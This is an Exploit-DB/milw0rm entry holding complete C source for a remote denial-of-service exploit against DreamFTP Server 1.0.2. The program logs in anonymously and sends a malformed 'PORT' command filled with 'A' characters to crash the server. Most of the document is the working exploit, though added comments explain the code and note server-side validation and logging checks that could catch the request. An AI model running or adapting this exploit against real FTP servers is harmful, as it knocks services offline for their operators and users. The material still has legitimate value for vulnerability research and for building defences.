BolinTech DreamFTP Server 1.0.2 - 'PORT' Remote Denial of Service

EDB-ID:

2972


Author:

InTeL

Type:

dos


Platform:

Windows

Date:

2006-12-21


/*
=============================================================
DREAM FTP Server 1.0.2 (PORT) Denial of Service Exploit
=============================================================
Discovered by: InTeL
*Tested on DREAM FTP v1.02 on Windows XP SP2*

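Dream FTP v1.02 also has anonymous logins enabled by default,
which enables anyone to crash the server at will.
If anonymous logins have been disabled, try it with
another user/pass account. (Disabling anonymous login therefore
only narrows exposure to users who hold valid credentials; it does
not remove the flaw in PORT handling.)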

Shoutz: bryan@top-notch.ws , Digerati, Erazerz, everyone else u kno who u are
*/

#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#pragma comment(lib,"wsock32.lib")

int usage(char *);


/*
 * Print the tool banner and the expected command line, then terminate the
 * process with exit status 0. Control never returns to the caller, so the
 * declared int return value is never produced.
 *
 * filename: program name to show in the USAGE line (main passes argv[0]).
 */
int usage(char *filename)
{
	fputs("Dream FTP v1.02 DoS exploit\r\n", stdout);
	fputs("By InTeL\r\n", stdout);
	fprintf(stdout, "USAGE: %s <IP_Address> <port>\r\n", filename);

	exit(0);
}

/*
 * Proof-of-concept client for the denial of service described in the file
 * header. It connects to the FTP service at <IP_Address>:<port>, logs in as
 * "Anonymous", and sends a single PORT command whose argument is a run of
 * 'A' characters.
 *
 * What reaches the server is a syntactically invalid PORT command: RFC 959
 * defines the argument as six comma-separated decimal fields
 * (h1,h2,h3,h4,p1,p2), while this client sends 31 letters and no commas.
 * NOTE(review): the page does not state the server-side root cause. The
 * status message below calls the argument an "overflow string", but nothing
 * here confirms whether the crash is a buffer overflow or a failure while
 * parsing the non-numeric argument.
 *
 * Defender notes: a server (or an FTP-aware filter in front of it) should
 * reject any PORT argument that is not six comma-separated integers in the
 * range 0-255 before acting on it, and the same format mismatch is a simple
 * condition to alert on in FTP control-channel logs. Per the file header,
 * anonymous login is enabled by default in this version, so the command can
 * be reached without credentials unless that default is changed.
 *
 * Returns 0 after the PORT command has been handed to send(); exits with
 * status 1 on Winsock, socket, resolve or connect failure, and via usage()
 * (status 0) when the argument count is wrong. The client never verifies
 * that the server actually stopped responding.
 */
int main(int argc, char *argv[])
{
	// evilbuf holds each outgoing command; the longest one built below is
	// "PORT " (5) + 31 filler bytes + "\r\n" (2) = 38 bytes plus the NUL,
	// which fits in 40. recvbuf only receives replies that are then discarded.
	char evilbuf[40], recvbuf[1028];
	unsigned short port;
	struct sockaddr_in saddr;
	struct hostent *he;
	WSADATA wsaData;
	SOCKET sock;

	if(argc != 3)
		usage(argv[0]);

	// No format or range validation: atoi()'s int result is stored straight
	// into an unsigned short.
	port = atoi(argv[2]);	
	if(WSAStartup(MAKEWORD(2,2), &wsaData) != 0){
		printf("Unable to initialize Winsock \n");
		exit(1);
	}

	if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET){
		printf("Socket Error \n");
		exit(1);
	}

	if ((he = gethostbyname(argv[1])) == NULL){  
		printf("Couldnt Resolve %s \n",argv[1]);
		exit(1);
	}

	// Build the IPv4 destination from the first address gethostbyname()
	// returned and the port given on the command line.
	memset(&saddr, 0, sizeof(saddr));
	saddr.sin_family = AF_INET;
	saddr.sin_addr = *((struct in_addr *)he->h_addr);	
	saddr.sin_port = htons(port);

	if (connect(sock, (struct sockaddr *)&saddr, sizeof(saddr)) == SOCKET_ERROR){
		printf("Connect Error \n");
      	exit(1);
	}

	// Read three times after connecting; the data is never inspected and
	// recv()'s return value is ignored. The count is hard-coded -- presumably
	// it matches how this server splits its greeting (not verifiable from
	// this file). Reading at most 1027 bytes into the zeroed 1028-byte
	// buffer always leaves a terminating NUL.
	for(int i = 0; i<3;i++){
		memset(recvbuf, 0, sizeof(recvbuf));
		recv(sock, recvbuf, 1027, 0);
	}
	printf("Logging in\r\n");	

	// Anonymous login, step 1: USER. The reply code is not checked, so a
	// refused login is not noticed by this client.
	memset(evilbuf, 0,sizeof(evilbuf));
	strcpy(evilbuf, "USER Anonymous\r\n"); //USER
	send (sock, evilbuf, strlen(evilbuf), 0);
   
	// Four discarded reads after USER (hard-coded count, results ignored).
	for(i=0;i<4;i++){
		memset(recvbuf,0,sizeof(recvbuf));
		recv(sock, recvbuf, 1027, 0);
   	}
   
	// Anonymous login, step 2: PASS, again with no check of the reply.
	memset(evilbuf, 0, sizeof(evilbuf));
	strcpy(evilbuf, "PASS Anonymous\r\n"); //PASS
	send (sock, evilbuf, strlen(evilbuf), 0);

	// Three discarded reads after PASS (hard-coded count, results ignored).
	for(i=0; i<3;i++) {
		memset(recvbuf, 0, sizeof(recvbuf));
		recv(sock, recvbuf, 1027, 0);
   	}
	printf("Building overflow string\r\n");

	// The malformed command: "PORT " followed by 'A' at indices 5..35
	// (31 bytes) and CRLF. The buffer was zeroed first, so the filler stays
	// NUL-terminated for strcat(). This is the request a server-side
	// validator or a detection rule should reject: the argument contains
	// no digits and no commas.
	memset(evilbuf,0,sizeof(evilbuf));
	strcpy(evilbuf, "PORT ");  //PORT 
	for(i = 5;i != 36;i++)
		evilbuf[i] = 'A';
   	strcat(evilbuf,"\r\n");
	
	send (sock, evilbuf, strlen(evilbuf), 0);  
   
	// Printed unconditionally: send()'s result is not checked and the
	// server's state is not probed afterwards. The socket is closed, but
	// WSACleanup() is never called before the process exits.
	printf("DoS Attack Done\r\n");
	closesocket(sock);

	return 0;
}

// milw0rm.com [2006-12-21]